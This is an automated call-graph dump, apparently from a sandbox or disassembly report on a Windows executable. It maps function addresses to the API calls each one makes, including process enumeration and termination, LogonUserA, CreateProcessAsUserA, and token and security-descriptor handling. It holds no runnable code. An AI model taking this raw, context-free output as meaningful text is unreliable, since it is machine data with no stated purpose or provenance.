7ff77572ceda 9441->9442 9443 7ff77572ca90 fputwc 9441->9443 9446 7ff77572cee0 9442->9446 9450 7ff77572ca90 fputwc 9442->9450 9443->9442 9444->9441 9445 7ff77572ca90 fputwc 9444->9445 9445->9444 9447 7ff77572cee9 9446->9447 9454 7ff77572cf16 9446->9454 9449 7ff77572ca90 fputwc 9447->9449 9448 7ff77572ca90 fputwc 9448->9454 9451 7ff77572cf6b 9449->9451 9450->9442 9458 7ff77572cf7f 9451->9458 9613 7ff77572cc72 9451->9613 9453 7ff77572cf97 9455 7ff77572cfbf 9453->9455 9459 7ff77572ca90 fputwc 9453->9459 9454->9448 9454->9451 9457 7ff77572ccd9 2 API calls 9454->9457 9455->9431 9456 7ff77572ca90 fputwc 9456->9458 9457->9454 9458->9453 9458->9456 9459->9453 9461 7ff77572e556 9460->9461 9462 7ff77572e6b4 9461->9462 9479 7ff77572d120 9461->9479 9524 7ff77572f663 9461->9524 9535 7ff77572e34c 9462->9535 9465 7ff77572e5ee 9466 7ff77572e6ac 9465->9466 9468 7ff77572e6e0 9465->9468 9531 7ff77572f717 9466->9531 9538 7ff77572e320 9468->9538 9470 7ff77572ee37 9472 7ff77572f803 6 API calls 9470->9472 9474 7ff77572ee44 9472->9474 9473 7ff77572ed9f 9473->9470 9494 7ff77572ee18 9473->9494 9545 7ff77572f949 9473->9545 9481 7ff77572f949 6 API calls 9474->9481 9490 7ff77572ee5c 9474->9490 9475 7ff77572f717 4 API calls 9475->9479 9477 7ff77572f949 6 API calls 9477->9470 9478 7ff77572f717 4 API calls 9487 7ff77572f3c7 9478->9487 9479->9425 9479->9426 9481->9490 9483 7ff77572eaae 9483->9475 9485 7ff77572f3de 9488 7ff77572f717 4 API calls 9485->9488 9487->9483 9487->9485 9492 7ff77572f717 4 API calls 9487->9492 9488->9483 9489 7ff77572eee9 9495 7ff77572fa57 6 API calls 9489->9495 9500 7ff77572ef05 9489->9500 9490->9489 9564 7ff77572fa57 9490->9564 9491 7ff77572f717 4 API calls 9491->9494 9492->9485 9494->9470 9494->9477 9495->9500 9496 7ff77572ef22 9497 7ff77572efdb 9496->9497 9498 7ff77572ef6e 9496->9498 9499 7ff77572efe6 9497->9499 9506 7ff77572f2cd 9497->9506 9504 7ff77572f763 6 API calls 9498->9504 9520 7ff77572ebc1 9498->9520 9501 7ff77572eff7 9499->9501 9505 7ff77572fa57 6 API calls 9499->9505 9500->9496 9570 7ff77572f763 9500->9570 9507 7ff77572f663 6 API calls 9501->9507 9519 7ff77572f030 9501->9519 9504->9520 9505->9501 9509 7ff77572f321 9506->9509 9511 7ff77572f763 6 API calls 9506->9511 9510 7ff77572f00e 9507->9510 9508 7ff77572f763 6 API calls 9508->9496 9513 7ff77572fa57 6 API calls 9509->9513 9509->9520 9512 7ff77572fa57 6 API calls 9510->9512 9511->9506 9512->9519 9513->9520 9515 7ff77572f717 4 API calls 9515->9519 9516 7ff77572f119 9517 7ff77572f1b4 9516->9517 9523 7ff77572f134 9516->9523 9518 7ff77572fa57 6 API calls 9517->9518 9517->9520 9518->9520 9519->9509 9519->9515 9519->9516 9519->9520 9522 7ff77572f763 6 API calls 9519->9522 9576 7ff77572fb9a 9519->9576 9520->9478 9520->9483 9521 7ff77572f763 6 API calls 9521->9523 9522->9519 9523->9520 9523->9521 9583 7ff77572f560 9524->9583 9527 7ff77572f68b 9589 7ff77572f605 9527->9589 9528 7ff77572f6ec malloc 9528->9527 9530 7ff77572f706 9528->9530 9530->9465 9532 7ff77572f73b 9531->9532 9533 7ff77572f724 9531->9533 9532->9462 9534 7ff77572f560 4 API calls 9533->9534 9534->9532 9536 7ff77572e320 6 API calls 9535->9536 9537 7ff77572e360 9536->9537 9537->9479 9539 7ff77572e32c 9538->9539 9540 7ff77572f663 6 API calls 9539->9540 9541 7ff77572e340 9540->9541 9541->9473 9541->9483 9541->9520 9542 7ff77572f803 9541->9542 9543 7ff77572f663 6 API calls 9542->9543 9544 7ff77572f814 9543->9544 9544->9473 9546 7ff77572f95d 9545->9546 9547 7ff77572f973 9545->9547 9549 7ff77572f763 6 API calls 9546->9549 9548 7ff77572edfd 9547->9548 9550 7ff77572f560 4 API calls 9547->9550 9557 7ff77572f9d6 9547->9557 9560 7ff77572f829 9548->9560 9549->9547 9551 7ff77572f99e 9550->9551 9552 7ff77572f9b4 9551->9552 9553 7ff77572f803 6 API calls 9551->9553 9552->9548 9555 7ff77572f605 LeaveCriticalSection 9552->9555 9553->9552 9554 7ff77572f560 4 API calls 9554->9557 9555->9557 9556 7ff77572f717 4 API calls 9556->9557 9557->9548 9557->9554 9557->9556 9558 7ff77572f829 6 API calls 9557->9558 9559 7ff77572f605 LeaveCriticalSection 9557->9559 9558->9557 9559->9557 9561 7ff77572f847 9560->9561 9562 7ff77572f663 6 API calls 9561->9562 9563 7ff77572ee0b 9562->9563 9563->9491 9565 7ff77572fa80 9564->9565 9566 7ff77572f663 6 API calls 9565->9566 9568 7ff77572fa90 9566->9568 9567 7ff77572fb42 9567->9489 9568->9567 9568->9568 9569 7ff77572f717 4 API calls 9568->9569 9569->9567 9572 7ff77572f77e 9570->9572 9571 7ff77572ef43 9571->9496 9571->9508 9572->9571 9573 7ff77572f663 6 API calls 9572->9573 9574 7ff77572f7b5 9573->9574 9574->9571 9575 7ff77572f717 4 API calls 9574->9575 9575->9571 9577 7ff77572fbaf 9576->9577 9578 7ff77572fbd0 9577->9578 9579 7ff77572fbb3 9577->9579 9581 7ff77572f663 6 API calls 9578->9581 9580 7ff77572f663 6 API calls 9579->9580 9582 7ff77572fbba 9580->9582 9581->9582 9582->9519 9584 7ff77572f573 EnterCriticalSection 9583->9584 9587 7ff77572f591 9583->9587 9584->9587 9585 7ff77572f5a4 InitializeCriticalSection InitializeCriticalSection 9585->9587 9586 7ff77572f5ec Sleep 9586->9587 9587->9584 9587->9585 9587->9586 9588 7ff77572f5fe 9587->9588 9588->9527 9588->9528 9590 7ff77572f60e LeaveCriticalSection 9589->9590 9591 7ff77572f625 9589->9591 9590->9591 9591->9530 9593 7ff77572cae7 9592->9593 9594 7ff77572cafc 9593->9594 9596 7ff77572cb4c 9593->9596 9595 7ff77572cb27 fwprintf 9594->9595 9597 7ff77572cb04 fwprintf 9594->9597 9599 7ff77572cb39 9595->9599 9602 7ff77572ca90 fputwc 9596->9602 9605 7ff77572cb51 9596->9605 9597->9599 9599->9430 9600 7ff77572cbd9 9600->9599 9604 7ff77572ca90 fputwc 9600->9604 9601 7ff77572cb8f strlen 9607 7ff77573026c 9601->9607 9602->9596 9604->9600 9605->9600 9605->9601 9606 7ff77572ca90 fputwc 9605->9606 9606->9605 9608 7ff77573027d 9607->9608 9609 7ff775730282 ___mb_cur_max_func ___lc_codepage_func 9607->9609 9608->9609 9610 7ff7757302bb 9609->9610 9611 7ff775730150 4 API calls 9610->9611 9612 7ff7757302cf 9611->9612 9612->9605 9614 7ff77572cc80 localeconv 9613->9614 9616 7ff77572ccae 9613->9616 9615 7ff77573026c 6 API calls 9614->9615 9615->9616 10136 7ff77572292e 10137 7ff775722944 10136->10137 10138 7ff77572299e 10137->10138 10139 7ff775722a53 10137->10139 10140 7ff775722a87 10138->10140 10141 7ff7757229a7 10138->10141 10142 7ff7757214e2 6 API calls 10139->10142 10143 7ff7757214e2 6 API calls 10140->10143 10144 7ff775722abb 10141->10144 10145 7ff7757229bd strlen 10141->10145 10154 7ff7757229d5 10142->10154 10143->10154 10146 7ff7757214e2 6 API calls 10144->10146 10147 7ff775722aef strcat 10145->10147 10145->10154 10146->10154 10148 7ff775722b08 strlen strlen 10147->10148 10156 7ff775722bec 10147->10156 10149 7ff775722b38 strlen strcat 10148->10149 10148->10154 10150 7ff775722b74 10149->10150 10152 7ff775722b95 strlen strlen 10150->10152 10150->10156 10151 7ff775722c1a 10153 7ff775722c32 LogonUserA 10151->10153 10172 7ff775722ce5 10151->10172 10155 7ff775722bbc strlen strcat 10152->10155 10152->10156 10158 7ff775722d9d CreateProcessAsUserA 10153->10158 10159 7ff775722c63 GetLastError 10153->10159 10160 7ff775722a3c 10154->10160 10161 7ff7757214e2 6 API calls 10154->10161 10155->10150 10156->10151 10156->10154 10169 7ff775723032 10156->10169 10157 7ff775723041 CreateProcessA 10162 7ff775723098 GetLastError 10157->10162 10163 7ff775723191 10157->10163 10166 7ff775722dfc GetLastError 10158->10166 10167 7ff775722eed 10158->10167 10165 7ff7757214e2 6 API calls 10159->10165 10161->10160 10168 7ff7757214e2 6 API calls 10162->10168 10164 7ff7757214e2 6 API calls 10163->10164 10164->10160 10165->10151 10170 7ff7757214e2 6 API calls 10166->10170 10171 7ff7757214e2 6 API calls 10167->10171 10167->10172 10168->10169 10169->10154 10169->10157 10170->10172 10171->10172 10173 7ff775722f27 CloseHandle 10172->10173 10174 7ff775722f2d 10172->10174 10173->10174 10174->10154 10175 7ff775722f36 10174->10175 10175->10160 10176 7ff7757214e2 6 API calls 10175->10176 10176->10160 9617 7ff77572c631 9619 7ff77572c64d 9617->9619 9618 7ff77572c6c3 9626 7ff77572b5da 9618->9626 9619->9618 9621 7ff77572c6c8 9619->9621 9630 7ff77572bdaf 9621->9630 9623 7ff77572ca67 9624 7ff77572b3e7 fputc 9625 7ff77572c382 9624->9625 9625->9623 9625->9624 9627 7ff77572b5f0 9626->9627 9650 7ff77572b4fe 9627->9650 9635 7ff77572bdc6 9630->9635 9631 7ff77572bf9d 9634 7ff77572b3e7 fputc 9631->9634 9632 7ff77572bf5e 9632->9631 9633 7ff77572b3e7 fputc 9632->9633 9633->9631 9636 7ff77572bfaa 9634->9636 9635->9632 9638 7ff77572b3e7 fputc 9635->9638 9637 7ff77572b3e7 fputc 9636->9637 9639 7ff77572bfbb 9637->9639 9638->9635 9641 7ff77572b3e7 fputc 9639->9641 9642 7ff77572bfc1 9639->9642 9640 7ff77572c008 9643 7ff77572c054 9640->9643 9645 7ff77572b3e7 fputc 9640->9645 9641->9639 9642->9640 9647 7ff77572b3e7 fputc 9642->9647 9662 7ff77572b64c 9642->9662 9676 7ff77572b420 9642->9676 9646 7ff77572b3e7 fputc 9643->9646 9645->9640 9648 7ff77572c068 9646->9648 9647->9642 9651 7ff77572b516 9650->9651 9652 7ff77572b523 9651->9652 9658 7ff77572b3e7 9651->9658 9654 7ff77572b3e7 fputc 9652->9654 9656 7ff77572b56e 9652->9656 9654->9652 9655 7ff77572b58a 9655->9625 9656->9655 9657 7ff77572b3e7 fputc 9656->9657 9657->9656 9659 7ff77572b3f8 9658->9659 9660 7ff77572b410 9659->9660 9661 7ff77572b409 fputc 9659->9661 9660->9651 9661->9660 9663 7ff77572b68f 9662->9663 9664 7ff77572b666 9662->9664 9665 7ff77572b6a7 9663->9665 9666 7ff77572b706 9663->9666 9668 7ff77573026c 6 API calls 9664->9668 9686 7ff775730047 9665->9686 9667 7ff77572b3e7 fputc 9666->9667 9674 7ff77572b6f2 9667->9674 9668->9663 9671 7ff77572b6f4 9673 7ff77572b3e7 fputc 9671->9673 9672 7ff77572b6dc 9672->9674 9675 7ff77572b3e7 fputc 9672->9675 9673->9674 9674->9642 9675->9672 9677 7ff775730047 4 API calls 9676->9677 9678 7ff77572b44f 9677->9678 9679 7ff77572b3e7 fputc 9678->9679 9684 7ff77572b462 9678->9684 9679->9678 9680 7ff77572b4d1 9682 7ff77572b4ed 9680->9682 9683 7ff77572b3e7 fputc 9680->9683 9681 7ff775730047 4 API calls 9681->9684 9682->9642 9683->9680 9684->9680 9684->9681 9685 7ff77572b3e7 fputc 9684->9685 9685->9684 9687 7ff775730058 ___mb_cur_max_func ___lc_codepage_func 9686->9687 9688 7ff775730053 9686->9688 9691 7ff77572ffd0 9687->9691 9688->9687 9692 7ff77572fff4 WideCharToMultiByte 9691->9692 9693 7ff77572ffe4 9691->9693 9692->9693 9695 7ff775730034 _errno 9692->9695 9694 7ff77572b6d5 9693->9694 9693->9695 9694->9671 9694->9672 9695->9694 10177 7ff77572212f 10178 7ff775722159 CreateToolhelp32Snapshot 10177->10178 10179 7ff7757221b6 10177->10179 10180 7ff775722227 GetLastError 10178->10180 10181 7ff775722175 Process32First 10178->10181 10182 7ff7757214e2 6 API calls 10179->10182 10183 7ff7757214e2 6 API calls 10180->10183 10184 7ff7757222ff GetLastError 10181->10184 10206 7ff7757221a6 10181->10206 10193 7ff7757221df 10182->10193 10183->10193 10185 7ff77572230c 10184->10185 10189 7ff7757214e2 6 API calls 10185->10189 10186 7ff7757221f4 10190 7ff7757214e2 6 API calls 10186->10190 10187 7ff7757228a3 10199 7ff7757214e2 6 API calls 10187->10199 10188 7ff775722888 CloseHandle 10188->10187 10188->10193 10189->10206 10192 7ff775722211 10190->10192 10193->10186 10193->10187 10194 7ff7757224d3 OpenProcess 10197 7ff7757224f4 TerminateProcess 10194->10197 10198 7ff7757225a3 GetLastError 10194->10198 10195 7ff7757224c2 strcmp 10195->10194 10195->10206 10196 7ff7757226ed Process32Next 10200 7ff775722704 GetLastError 10196->10200 10196->10206 10201 7ff77572250a GetLastError 10197->10201 10202 7ff775722484 CloseHandle 10197->10202 10203 7ff7757214e2 6 API calls 10198->10203 10199->10192 10200->10206 10204 7ff7757214e2 6 API calls 10201->10204 10202->10206 10203->10206 10204->10206 10205 7ff7757214e2 6 API calls 10205->10206 10206->10188 10206->10194 10206->10195 10206->10196 10206->10202 10206->10205 10662 7ff77572702f 10663 7ff775727057 wcslen 10662->10663 10664 7ff77572704b 10662->10664 10663->10664 10665 7ff77572dc2f 10666 7ff77572dc62 10665->10666 10667 7ff77572dc56 10665->10667 10668 7ff77572cacd 10 API calls 10666->10668 10669 7ff77572ccd9 2 API calls 10667->10669 10673 7ff77572db86 10668->10673 10669->10673 10670 7ff77572e2e0 10671 7ff77572e301 10670->10671 10672 7ff77572ccd9 2 API calls 10670->10672 10672->10671 10673->10670 10674 7ff77572ccd9 fputwc fwprintf 10673->10674 10674->10673 10679 7ff77572c436 10680 7ff77572c48e 10679->10680 10681 7ff77572c44b 10679->10681 10682 7ff77572b593 strlen 10680->10682 10683 7ff77572c475 wcslen 10681->10683 10684 7ff77572c46e 10681->10684 10688 7ff77572c382 10682->10688 10683->10684 10685 7ff77572b420 5 API calls 10684->10685 10685->10688 10686 7ff77572ca67 10687 7ff77572b3e7 fputc 10687->10688 10688->10686 10688->10687 10693 7ff77572e045 10698 7ff77572db86 10693->10698 10694 7ff77572e2e0 10695 7ff77572e301 10694->10695 10696 7ff77572ccd9 2 API calls 10694->10696 10696->10695 10697 7ff77572ccd9 fputwc fwprintf 10697->10698 10698->10694 10698->10697 10699 7ff775725c44 10700 7ff775725c60 10699->10700 10709 7ff775725cdf 10699->10709 10702 7ff775725c79 CreateFileA 10700->10702 10703 7ff775725d24 10700->10703 10701 7ff7757214e2 6 API calls 10711 7ff775725d1a 10701->10711 10704 7ff775725ccc GetLastError 10702->10704 10705 7ff775725cb2 GetFileTime 10702->10705 10706 7ff7757214e2 6 API calls 10703->10706 10707 7ff775725cd9 10704->10707 10708 7ff775725d57 10704->10708 10705->10704 10705->10708 10706->10711 10707->10708 10707->10709 10710 7ff775725deb CloseHandle 10708->10710 10708->10711 10709->10701 10710->10711 9716 7ff77572ae48 9717 7ff77572ae5a EnterCriticalSection 9716->9717 9718 7ff77572aeb4 9716->9718 9720 7ff77572ae73 9717->9720 9719 7ff77572aeab LeaveCriticalSection 9719->9718 9720->9719 9721 7ff77572ae98 free 9720->9721 9721->9719 10226 7ff77572354e 10227 7ff7757234db 10226->10227 10228 7ff7757237ac 10227->10228 10229 7ff7757214e2 6 API calls 10227->10229 10230 7ff775723505 10229->10230 9722 7ff77572a650 9723 7ff77572a659 9722->9723 9724 7ff77572a662 9723->9724 9726 7ff77572aebd 9723->9726 9727 7ff77572aed3 9726->9727 9728 7ff77572aecb 9726->9728 9727->9724 9728->9727 9729 7ff77572aee1 9728->9729 9731 7ff77572aed1 9728->9731 9729->9727 9730 7ff77572aeeb InitializeCriticalSection 9729->9730 9730->9727 9731->9727 9732 7ff77572af29 free 9731->9732 9733 7ff77572af37 DeleteCriticalSection 9731->9733 9732->9731 9733->9727 9734 7ff77572de59 9735 7ff77572de6f 9734->9735 9742 7ff77572d9bb 9735->9742 9737 7ff77572e2e0 9738 7ff77572e301 9737->9738 9739 7ff77572ccd9 2 API calls 9737->9739 9739->9738 9740 7ff77572ccd9 fputwc fwprintf 9741 7ff77572db86 9740->9741 9741->9737 9741->9740 9743 7ff77572d9cd 9742->9743 9744 7ff77572d00f 6 API calls 9743->9744 9745 7ff77572da05 9744->9745 9746 7ff77572da1a 9745->9746 9747 7ff77572da2c 9745->9747 9749 7ff77572cc00 10 API calls 9746->9749 9748 7ff77572da9d 9747->9748 9750 7ff77572da42 9747->9750 9751 7ff77572daa8 strlen 9748->9751 9752 7ff77572daa1 9748->9752 9756 7ff77572da27 9749->9756 9753 7ff77572da4e strlen 9750->9753 9754 7ff77572da46 9750->9754 9751->9752 9760 7ff77572d897 9752->9760 9753->9754 9757 7ff77572cdd0 9 API calls 9754->9757 9756->9741 9758 7ff77572da81 9757->9758 9758->9756 9759 7ff77572ca90 fputwc 9758->9759 9759->9758 9761 7ff77572d8b9 9760->9761 9762 7ff77572cdd0 9 API calls 9761->9762 9763 7ff77572d904 9762->9763 9764 7ff77572ca90 fputwc 9763->9764 9765 7ff77572d925 9764->9765 9766 7ff775730659 IsDBCSLeadByteEx 10231 7ff77572c958 10232 7ff77572c960 localeconv 10231->10232 10234 7ff77572c382 10231->10234 10233 7ff77573026c 6 API calls 10232->10233 10233->10234 10235 7ff77572ca67 10234->10235 10236 7ff77572b3e7 fputc 10234->10236 10236->10234 10716 7ff77572385c 10717 7ff775723869 10716->10717 10725 7ff7757238a9 10716->10725 10718 7ff775721cf4 8 API calls 10717->10718 10720 7ff775723875 10718->10720 10719 7ff7757214e2 6 API calls 10722 7ff7757238ce 10719->10722 10721 7ff775721c73 8 API calls 10720->10721 10720->10722 10723 7ff775723889 10721->10723 10723->10722 10724 7ff7757238d8 GetLastError 10723->10724 10723->10725 10726 7ff7757214e2 6 API calls 10724->10726 10725->10719 10726->10722 10237 7ff77572dd5c 10238 7ff77572dd6e 10237->10238 10245 7ff77572d3c1 10238->10245 10240 7ff77572db86 10241 7ff77572e2e0 10240->10241 10244 7ff77572ccd9 fputwc fwprintf 10240->10244 10242 7ff77572e301 10241->10242 10243 7ff77572ccd9 2 API calls 10241->10243 10243->10242 10244->10240 10246 7ff77572d3f3 10245->10246 10247 7ff77572d513 10246->10247 10252 7ff77572ca90 fputwc 10246->10252 10248 7ff77572d593 10247->10248 10250 7ff77572ca90 fputwc 10247->10250 10249 7ff77572d5af 10248->10249 10251 7ff77572ca90 fputwc 10248->10251 10249->10240 10250->10247 10251->10248 10252->10246 11100 7ff77572475d 11101 7ff775724b28 11100->11101 11102 7ff775724b2d fclose 11101->11102 11103 7ff775724b35 11101->11103 11102->11103 11104 7ff775724ba2 11103->11104 11107 7ff775724b39 11103->11107 11105 7ff7757214e2 6 API calls 11104->11105 11106 7ff775724b78 11105->11106 11108 7ff7757214e2 6 API calls 11107->11108 11108->11106 10274 7ff775721d60 10275 7ff775721d77 10274->10275 10276 7ff775721e23 10274->10276 10278 7ff775721d80 OpenProcessToken 10275->10278 10279 7ff775721e53 10275->10279 10277 7ff7757214e2 6 API calls 10276->10277 10285 7ff775721e21 10277->10285 10281 7ff775721eb8 GetLastError 10278->10281 10282 7ff775721d98 GetTokenInformation 10278->10282 10280 7ff7757214e2 6 API calls 10279->10280 10280->10285 10283 7ff7757214e2 6 API calls 10281->10283 10284 7ff775721dce GetLastError 10282->10284 10300 7ff775721fcd 10282->10300 10283->10285 10287 7ff775721f67 LocalAlloc 10284->10287 10288 7ff775721de0 10284->10288 10291 7ff7757214e2 6 API calls 10285->10291 10286 7ff775722090 LocalAlloc 10290 7ff7757220a8 GetLengthSid memcpy 10286->10290 10299 7ff7757220cb 10286->10299 10289 7ff775721f82 GetTokenInformation 10287->10289 10287->10299 10292 7ff7757214e2 6 API calls 10288->10292 10289->10286 10294 7ff775721fac GetLastError 10289->10294 10290->10299 10295 7ff775721ead 10291->10295 10293 7ff775721df6 10292->10293 10296 7ff775721e0e CloseHandle 10293->10296 10297 7ff775721e05 LocalFree 10293->10297 10298 7ff7757214e2 6 API calls 10294->10298 10296->10285 10296->10295 10297->10296 10298->10300 10300->10286 10300->10299 10301 7ff775726d60 10302 7ff775726d6f 10301->10302 10303 7ff775726d82 10301->10303 10304 7ff775726d74 10302->10304 10305 7ff775726db5 10302->10305 10306 7ff7757214e2 6 API calls 10303->10306 10307 7ff775726d79 10304->10307 10309 7ff7757214e2 6 API calls 10304->10309 10308 7ff7757214e2 6 API calls 10305->10308 10306->10307 10308->10307 10309->10307 10310 7ff77572c562 10311 7ff77572c566 10310->10311 10315 7ff77572c382 10311->10315 10316 7ff77572b9b0 10311->10316 10313 7ff77572ca67 10314 7ff77572b3e7 fputc 10314->10315 10315->10313 10315->10314 10323 7ff77572ba02 10316->10323 10317 7ff77572bb66 10318 7ff77572bb7f 10317->10318 10321 7ff77572b3e7 fputc 10317->10321 10319 7ff77572bba6 10318->10319 10322 7ff77572b3e7 fputc 10318->10322 10319->10315 10320 7ff77572b3e7 fputc 10320->10323 10321->10317 10322->10318 10323->10317 10323->10320 11109 7ff775723b64 11110 7ff775723b8a 11109->11110 11111 7ff775723bc1 11109->11111 11112 7ff775723bec 11110->11112 11113 7ff775723b8f 11110->11113 11114 7ff7757214e2 6 API calls 11111->11114 11116 7ff7757214e2 6 API calls 11112->11116 11128 7ff775723909 11113->11128 11119 7ff775723bb9 11114->11119 11116->11119 11118 7ff775723ba2 SetFileAttributesA 11118->11119 11120 7ff775723c3e GetLastError 11118->11120 11119->11120 11122 7ff775723c6a 11119->11122 11121 7ff7757214e2 6 API calls 11120->11121 11121->11119 11123 7ff775723d7d 11122->11123 11124 7ff775723d02 11122->11124 11125 7ff7757214e2 6 API calls 11123->11125 11127 7ff7757214e2 6 API calls 11124->11127 11126 7ff775723d30 11125->11126 11127->11126 11129 7ff775723998 11128->11129 11130 7ff775723921 11128->11130 11131 7ff7757214e2 6 API calls 11129->11131 11132 7ff77572392a GetFileAttributesA 11130->11132 11133 7ff7757239d1 11130->11133 11138 7ff77572393b 11131->11138 11135 7ff775723a0a GetLastError 11132->11135 11132->11138 11134 7ff7757214e2 6 API calls 11133->11134 11134->11138 11136 7ff7757214e2 6 API calls 11135->11136 11136->11138 11137 7ff775723b3a 11139 7ff7757214e2 6 API calls 11137->11139 11138->11137 11140 7ff775723974 11138->11140 11141 7ff775723b5f 11139->11141 11142 7ff7757214e2 6 API calls 11140->11142 11141->11141 11143 7ff77572398a 11142->11143 11143->11118 11143->11119 10727 7ff775722463 10728 7ff775722484 CloseHandle 10727->10728 10747 7ff7757223f0 10728->10747 10729 7ff7757226ed Process32Next 10730 7ff775722704 GetLastError 10729->10730 10729->10747 10730->10747 10731 7ff775722888 CloseHandle 10734 7ff7757221e4 10731->10734 10735 7ff7757228a3 10731->10735 10733 7ff7757214e2 6 API calls 10733->10747 10734->10735 10736 7ff7757221f4 10734->10736 10742 7ff7757214e2 6 API calls 10735->10742 10739 7ff7757214e2 6 API calls 10736->10739 10737 7ff7757224d3 OpenProcess 10740 7ff7757224f4 TerminateProcess 10737->10740 10741 7ff7757225a3 GetLastError 10737->10741 10738 7ff7757224c2 strcmp 10738->10737 10738->10747 10743 7ff775722211 10739->10743 10740->10728 10745 7ff77572250a GetLastError 10740->10745 10744 7ff7757214e2 6 API calls 10741->10744 10742->10743 10744->10747 10746 7ff7757214e2 6 API calls 10745->10746 10746->10747 10747->10728 10747->10729 10747->10731 10747->10733 10747->10737 10747->10738 10748 7ff775723c63 10749 7ff775723cec 10748->10749 10750 7ff775723d7d 10749->10750 10753 7ff775723d02 10749->10753 10751 7ff7757214e2 6 API calls 10750->10751 10752 7ff775723d30 10751->10752 10754 7ff7757214e2 6 API calls 10753->10754 10754->10752 11144 7ff77572a369 11145 7ff77572a3a7 11144->11145 11146 7ff77572a378 11144->11146 11148 7ff7757214e2 6 API calls 11145->11148 11150 7ff77572a264 11146->11150 11149 7ff77572a390 11148->11149 11151 7ff77572a2c9 11150->11151 11152 7ff77572a286 11150->11152 11153 7ff7757214e2 6 API calls 11151->11153 11154 7ff775729ed0 8 API calls 11152->11154 11156 7ff77572a29f 11153->11156 11155 7ff77572a299 11154->11155 11155->11156 11157 7ff77572a2f9 _errno _strtoui64 _errno 11155->11157 11156->11149 11157->11156 11158 7ff77572a32c _errno 11157->11158 11159 7ff7757214e2 6 API calls 11158->11159 11159->11156 10792 7ff775724c69 10793 7ff775724be8 10792->10793 10794 7ff775724d5a 10793->10794 10796 7ff775724c0a 10793->10796 10795 7ff7757214e2 6 API calls 10794->10795 10798 7ff775724d7c 10795->10798 10797 7ff7757214e2 6 API calls 10796->10797 10799 7ff775724c20 10797->10799 10798->10798 9767 7ff77572a66c 9768 7ff77572a67e 9767->9768 9769 7ff77572aebd 3 API calls 9768->9769 9770 7ff77572a693 9768->9770 9769->9770 9771 7ff775730671 HeapFree 9772 7ff77573b608 9771->9772 10800 7ff77572a072 10801 7ff77572a08c 10800->10801 10802 7ff77572a0b6 10800->10802 10806 7ff775729f70 10801->10806 10804 7ff7757214e2 6 API calls 10802->10804 10805 7ff77572a0a3 10804->10805 10807 7ff775729fd7 10806->10807 10808 7ff775729f9b 10806->10808 10809 7ff7757214e2 6 API calls 10807->10809 10810 7ff775729ed0 8 API calls 10808->10810 10812 7ff775729fb4 10809->10812 10811 7ff775729fae 10810->10811 10811->10812 10813 7ff77572a007 _errno 10811->10813 10812->10805 10814 7ff775730560 10813->10814 10815 7ff77572a029 _errno 10814->10815 10815->10812 10816 7ff77572a034 _errno 10815->10816 10817 7ff7757214e2 6 API calls 10816->10817 10817->10812 10324 7ff775722d71 10325 7ff775722f1c 10324->10325 10326 7ff775722f27 CloseHandle 10325->10326 10327 7ff775722f2d 10325->10327 10326->10327 10328 7ff775722f36 10327->10328 10329 7ff7757229db 10327->10329 10330 7ff7757214e2 6 API calls 10328->10330 10331 7ff775722a3c 10328->10331 10329->10331 10332 7ff7757214e2 6 API calls 10329->10332 10330->10331 10332->10331 10848 7ff77572dc75 10849 7ff77572dccd 10848->10849 10851 7ff77572dc8a 10848->10851 10850 7ff77572cfc8 strlen 10849->10850 10858 7ff77572db86 10850->10858 10852 7ff77572dcb4 wcslen 10851->10852 10853 7ff77572dcad 10851->10853 10852->10853 10854 7ff77572ccd9 2 API calls 10853->10854 10854->10858 10855 7ff77572e2e0 10856 7ff77572e301 10855->10856 10857 7ff77572ccd9 2 API calls 10855->10857 10857->10856 10858->10855 10859 7ff77572ccd9 fputwc fwprintf 10858->10859 10859->10858 11178 7ff775726776 11179 7ff77572678c 11178->11179 11180 7ff7757267fb 11178->11180 11182 7ff77572682e 11179->11182 11183 7ff775726795 11179->11183 11181 7ff7757214e2 6 API calls 11180->11181 11201 7ff775726824 11181->11201 11184 7ff7757214e2 6 API calls 11182->11184 11185 7ff77572685e 11183->11185 11186 7ff77572679e 11183->11186 11184->11201 11189 7ff7757214e2 6 API calls 11185->11189 11187 7ff7757267aa ExpandEnvironmentStringsA 11186->11187 11188 7ff77572688e 11186->11188 11190 7ff775726909 GetLastError 11187->11190 11191 7ff7757267bb 11187->11191 11193 7ff7757214e2 6 API calls 11188->11193 11189->11201 11197 7ff7757214e2 6 API calls 11190->11197 11194 7ff7757267c9 11191->11194 11195 7ff7757269dc 11191->11195 11192 7ff775726a51 11193->11201 11198 7ff7757214e2 6 API calls 11194->11198 11199 7ff7757214e2 6 API calls 11195->11199 11196 7ff7757214e2 6 API calls 11200 7ff7757267f1 11196->11200 11197->11201 11198->11200 11199->11201 11201->11192 11201->11196 10357 7ff775729181 10367 7ff775728e2e 10357->10367 10358 7ff7757290f2 GetProcessHeap HeapFree 10358->10367 10359 7ff775728da0 10360 7ff775728da9 FreeLibrary 10359->10360 10361 7ff775729284 10359->10361 10360->10361 10362 7ff77572a1f1 11 API calls 10362->10367 10363 7ff775728ecc strlen 10363->10367 10364 7ff775728f64 GetProcessHeap HeapAlloc 10364->10367 10365 7ff7757214e2 6 API calls 10365->10367 10366 7ff775728fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 10366->10367 10367->10358 10367->10359 10367->10362 10367->10363 10367->10364 10367->10365 10367->10366 10368 7ff77572795a 14 API calls 10367->10368 10369 7ff7757291dc LocalFree 10367->10369 10368->10367 10369->10367 9794 7ff775730689 GetProcessHeap 9795 7ff77572de8a 9798 7ff77572dea6 9795->9798 9796 7ff77572cc00 10 API calls 9804 7ff77572db86 9796->9804 9797 7ff77572df1c 9797->9796 9798->9797 9799 7ff77572df21 9798->9799 9806 7ff77572d5bc 9799->9806 9801 7ff77572e2e0 9802 7ff77572e301 9801->9802 9803 7ff77572ccd9 2 API calls 9801->9803 9803->9802 9804->9801 9805 7ff77572ccd9 fputwc fwprintf 9804->9805 9805->9804 9813 7ff77572d5d3 9806->9813 9807 7ff77572d7aa 9810 7ff77572ca90 fputwc 9807->9810 9808 7ff77572d76b 9808->9807 9809 7ff77572ca90 fputwc 9808->9809 9809->9807 9811 7ff77572d7b7 9810->9811 9812 7ff77572ca90 fputwc 9811->9812 9815 7ff77572d7c8 9812->9815 9813->9808 9814 7ff77572ca90 fputwc 9813->9814 9814->9813 9817 7ff77572ca90 fputwc 9815->9817 9818 7ff77572d7ce 9815->9818 9816 7ff77572d815 9819 7ff77572d861 9816->9819 9822 7ff77572ca90 fputwc 9816->9822 9817->9815 9818->9816 9820 7ff77572cc72 7 API calls 9818->9820 9821 7ff77572ca90 fputwc 9818->9821 9824 